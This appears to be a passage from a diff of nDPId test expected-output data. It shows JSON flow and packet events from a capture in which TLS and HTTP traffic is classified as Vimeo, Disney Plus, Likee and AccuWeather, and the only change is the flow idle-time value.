-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631088115362,"flow_last_seen":1631088115362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631088115362,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1631088115362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115362,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8aylAAEAG8xTAqAGAx+hSbbaEAbsR7WhdAAAAAKAC+vCzrwAAAgQFtAQCCAqzLdcpAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1631088115376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADQGaj7H6FJtwKgBgAG7toQ\/rdv6Ee1oXqAS\/\/\/HZwAAAgQFTAQCCApg6mr7sy3XKQEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1631088115376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631088115376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0aypAAEAG8xvAqAGAx+hSbbaEAbsR7WheP63b+4AQAfbzyQAAAQEICrMt1zdg6mr7"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} 
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631088115362,"flow_last_seen":1631088115362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631088115362,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1631088115362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115362,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8aylAAEAG8xTAqAGAx+hSbbaEAbsR7WhdAAAAAKAC+vCzrwAAAgQFtAQCCAqzLdcpAAAAAAEDAwc="} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1631088115376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADQGaj7H6FJtwKgBgAG7toQ\/rdv6Ee1oXqAS\/\/\/HZwAAAgQFTAQCCApg6mr7sy3XKQEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1631088115376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631088115376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0aypAAEAG8xvAqAGAx+hSbbaEAbsR7WheP63b+4AQAfbzyQAAAQEICrMt1zdg6mr7"} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 
2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":256,"packets-processed":255,"total-skipped-flows":0,"total-l4-data-len":113664,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":7,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1637349011376} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637349011376,"flow_last_seen":1637349011376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637349011376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1637349011376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TGJAAEAGkyTAqAGAj8wJQb8WAbs5hVBVAAAAAKAC+vA+\/wAAAgQFtAQCCAoHfmCrAAAAAAEDAww="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1637349011393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011393,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8T5MAAPMGHPOPzAlBwKgBgAG7vxa2dgKJOYVQVqASBZSQpgAAAgQFoAQCCArIQyJ4B35gqwEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1637349011393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637349011393,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0TGNAAEAGkyvAqAGAj8wJQb8WAbs5hVBWtnYCioAQABDE0gAAAQEICgd+YL3IQyJ4"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637349011376,"flow_last_seen":1637349011376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637349011376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1637349011376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TGJAAEAGkyTAqAGAj8wJQb8WAbs5hVBVAAAAAKAC+vA+\/wAAAgQFtAQCCAoHfmCrAAAAAAEDAww="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1637349011393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011393,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8T5MAAPMGHPOPzAlBwKgBgAG7vxa2dgKJOYVQVqASBZSQpgAAAgQFoAQCCArIQyJ4B35gqwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1637349011393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637349011393,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0TGNAAEAGkyvAqAGAj8wJQb8WAbs5hVBWtnYCioAQABDE0gAAAQEICgd+YL3IQyJ4"} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":285,"packets-processed":284,"total-skipped-flows":0,"total-l4-data-len":121431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":8,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1642584017659} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642584017659,"flow_last_seen":1642584017659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642584017659,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642584017659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017659,"pkt":"CL6sCxdumt9Y+uvcCABFAAA8EtFAAEAG2zrAqAypFwxoU5lQAbvzO0RFAAAAAKAC\/\/9KaQAAAgQFtAQCCApYVYYCAAAAAAEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642584017680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017680,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAADcG9wsXDGhTwKgMqQG7mVB1nT8a8ztERqAS\/ojzIwAAAgQFtAQCCAqw3vMWWFWGAgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642584017681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642584017681,"pkt":"CL6sCxdumt9Y+uvcCABFAAA0EtJAAEAG20HAqAypFwxoU5lQAbvzO0RGdZ0\/G4AQAKwfuAAAAQEIClhVhhew3vMW"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
